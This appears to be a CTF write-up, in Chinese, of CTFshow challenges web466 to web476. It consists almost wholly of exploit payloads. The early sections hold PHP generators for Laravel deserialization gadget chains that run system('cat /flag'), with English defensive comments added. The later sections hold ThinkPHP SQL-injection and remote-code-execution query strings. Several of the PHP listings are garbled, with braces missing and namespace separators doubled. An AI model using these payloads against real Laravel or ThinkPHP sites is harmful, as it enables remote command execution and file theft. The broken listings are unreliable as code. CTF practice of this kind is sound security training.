CTFSHOW框架复现篇
Posted yu22x
web466
反序列化入口格式：/admin/<序列化串的base64编码>
参考文章
https://xz.aliyun.com/t/11002
payload
<?php
// Generator for the web466 challenge: builds a small object graph, serializes it and prints
// the result base64-encoded.
// NOTE(review): braces and statement terminators were lost in extraction and the namespace
// separators appear doubled, so this listing is not valid PHP as shown.
// Defensive takeaway: the page describes the target as deserializing a base64 string taken
// from the URL path. Untrusted input must never reach unserialize(); prefer JSON, or restrict
// instantiation with the allowed_classes option.
// Detection hint: base64 text starting with "Tzo" decodes to a PHP serialized object ("O:").
namespace Illuminate\\Validation
// Local declaration carrying only the one property this graph sets.
class Validator
public $extensions = [];
public function __construct()
// Maps an empty-string key to the name of a PHP function.
$this->extensions = ['' => 'system'];
namespace Illuminate\\Broadcasting
use Illuminate\\Validation\\Validator;
// Outer object of the graph; both properties are filled in the constructor.
class PendingBroadcast
protected $events;
protected $event;
public function __construct($cmd)
// $events holds the Validator instance; $event holds the caller-supplied string.
$this->events = new Validator();
$this->event = $cmd;
// Emit the serialized graph as base64 on stdout.
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
?>
web467
参考文章https://xz.aliyun.com/t/9478
<?php
// Generator for the web467 challenge: serializes a PendingBroadcast that wraps a Dispatcher
// and prints the result base64-encoded.
// NOTE(review): braces and statement terminators were lost in extraction and the namespace
// separators appear doubled, so this listing is not valid PHP as shown.
// Defensive takeaway: object graphs like this only matter when an application passes
// request data to unserialize(); remove that sink or restrict it with allowed_classes.
namespace Illuminate\\Broadcasting
use Illuminate\\Events\\Dispatcher;
class PendingBroadcast
protected $events;
protected $event;
public function __construct($cmd)
// The same string is passed to the Dispatcher and stored as $event.
$this->events = new Dispatcher($cmd);
$this->event=$cmd;
// Emit the serialized graph as base64 on stdout.
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
namespace Illuminate\\Events
// Local declaration carrying only the $listeners property.
class Dispatcher
protected $listeners;
public function __construct($event)
// Keys the listener table by the supplied string, with a one-element list naming a PHP function.
$this->listeners=[$event=>['system']];
web468
参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html
<?php
// Generator for the web468 challenge: serializes a PendingBroadcast that wraps a
// ChannelManager and prints the result base64-encoded.
// NOTE(review): braces and statement terminators were lost in extraction and the namespace
// separators appear doubled, so this listing is not valid PHP as shown.
// Defensive takeaway: the root cause is deserialization of untrusted input; swapping one
// helper class for another (as successive challenges do) does not change that, so blocking
// individual class names is not a fix.
namespace Illuminate\\Broadcasting
use Illuminate\\Notifications\\ChannelManager;
class PendingBroadcast
protected $events;
public function __construct($cmd)
$this->events = new ChannelManager($cmd);
$seri = new PendingBroadcast('cat /flag');
// Emit the serialized graph as base64 on stdout.
echo base64_encode(serialize($seri));
namespace Illuminate\\Notifications
// Local declaration carrying only the three properties set below.
class ChannelManager
protected $app;
protected $defaultChannel;
protected $customCreators;
public function __construct($cmd)
// $defaultChannel names the key that $customCreators maps to a PHP function name.
$this->defaultChannel = 'yu22x';
$this->customCreators = array('yu22x' => 'system');
// $app holds the caller-supplied string rather than an application object.
$this->app = $cmd;
?>
发送 payload 后，查看响应页面的源代码即可。
web469|web470
参考文章https://www.cnblogs.com/shivers0x72/p/14800109.html
<?php
// Generator for the web469/web470 challenges: serializes a PendingBroadcast that wraps
// Faker generator objects and prints the result base64-encoded.
// NOTE(review): braces and statement terminators were lost in extraction and the namespace
// separators appear doubled, so this listing is not valid PHP as shown.
// Defensive takeaway: besides removing unserialize() on untrusted input, note that Faker is
// typically a development-only dependency; production installs made without dev packages
// do not autoload these classes. Verify against the deployment's composer configuration.
namespace Illuminate\\Broadcasting
use Faker\\ValidGenerator;
class PendingBroadcast
protected $events;
public function __construct($cmd)
$this->events = new ValidGenerator($cmd);
$seri = new PendingBroadcast('cat /flag');
// Emit the serialized graph as base64 on stdout.
echo base64_encode(serialize($seri));
namespace Faker
use Faker\\DefaultGenerator;
// Local declaration carrying only the three properties set below.
class ValidGenerator
protected $maxRetries;
protected $validator;
protected $generator;
public function __construct($cmd)
// $generator wraps the caller-supplied string; $validator names a PHP function.
$this->generator = new DefaultGenerator($cmd);
$this->maxRetries = 10000000;
$this->validator = 'system';
namespace Faker
// Local declaration that simply stores the supplied value in $default.
class DefaultGenerator
protected $default;
public function __construct($cmd)
$this->default = $cmd;
?>
web471
参考文章http://www.136.la/jingpin/show-180114.html#POC1_46
<?php
// Generator for the web471 challenge: serializes a PendingBroadcast holding a Bus Dispatcher
// and a QueuedCommand, and prints the result base64-encoded.
// NOTE(review): braces and statement terminators were lost in extraction and the namespace
// separators appear doubled, so this listing is not valid PHP as shown.
// Defensive takeaway: every value here is fixed at build time, so the only control point is
// the application side; do not unserialize request data, and keep the framework patched.
namespace Illuminate\\Broadcasting
use Illuminate\\Bus\\Dispatcher;
use Illuminate\\Foundation\\Console\\QueuedCommand;
class PendingBroadcast
protected $events;
protected $event;
public function __construct()
// No arguments: both members are constructed with their hard-coded defaults.
$this->events = new Dispatcher();
$this->event = new QueuedCommand();
namespace Illuminate\\Foundation\\Console
// Local declaration with a single public property preset to a string.
class QueuedCommand
public $connection = 'cat /flag';
namespace Illuminate\\Bus
// Local declaration carrying only $queueResolver, set to a PHP function name.
class Dispatcher
protected $queueResolver;
public function __construct()
$this->queueResolver='system';
// Bare namespace keyword: presumably the global-namespace section whose braces were lost.
namespace
use Illuminate\\Broadcasting\\PendingBroadcast;
// Emit the serialized graph as base64 on stdout.
echo base64_encode(serialize(new PendingBroadcast()));
web472
参考文章https://blog.csdn.net/qq_38154820/article/details/114610513
payload
<?php
// Generator for the web472 challenge: wires a Bus Dispatcher and a BroadcastEvent into a
// PendingBroadcast, serializes it and prints the result base64-encoded.
// NOTE(review): braces and statement terminators were lost in extraction and the namespace
// separators appear doubled, so this listing is not valid PHP as shown.
// Defensive takeaway: the sink is unserialize() on untrusted input; restrict it with
// allowed_classes or replace the format, and alert on base64 values starting with "Tzo"
// (a PHP serialized object) in request paths or parameters.
namespace Illuminate\\Broadcasting
// NOTE(review): this import is not referenced by any visible line of the listing.
use Illuminate\\Contracts\\Events\\Dispatcher;
class PendingBroadcast
protected $event;
protected $events;
public function __construct($events, $event)
// Plain assignment of both constructor arguments; no validation is performed.
$this->event = $event;
$this->events = $events;
namespace Illuminate\\Bus
// Local declaration that stores whatever is passed as $queueResolver.
class Dispatcher
protected $queueResolver;
public function __construct($queueResolver)
$this->queueResolver = $queueResolver;
namespace Illuminate\\Broadcasting
// Local declaration with a single public property taken from the constructor.
class BroadcastEvent
public $connection;
public function __construct($connection)
$this->connection = $connection;
// Bare namespace keyword: presumably the global-namespace section whose braces were lost.
namespace
// $c carries the string, $a carries a PHP function name, $b ties them together.
$c = new Illuminate\\Broadcasting\\BroadcastEvent('cat /flag');
$a = new Illuminate\\Bus\\Dispatcher('system');
$b = new Illuminate\\Broadcasting\\PendingBroadcast($a,$c);
// Emit the serialized graph as base64 on stdout.
echo base64_encode(serialize($b));
web473
参考文章https://www.cnblogs.com/litlife/p/11273652.html
试了几个报错函数，其中 exp 可用。
payload
index.php?s=index/index/inject&a[0]=inc&a[1]=exp(~(select load_file('/flag')))&a[2]=1
web474
参考文章https://blog.csdn.net/rfrder/article/details/114599310
public/index.php?s=index/index/rce&cache=%0d%0asystem('cat /flag');//
接着访问
runtime/cache/0f/ea6a13c52b4d4725368f24b045ca84.php
web475
s=cat /flag&_method=__construct&method=POST&filter[]=system
aaaa=cat /flag&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=cat /flag
c=cat /flag&f=calc&_method=filter
web476
?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*
?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /f*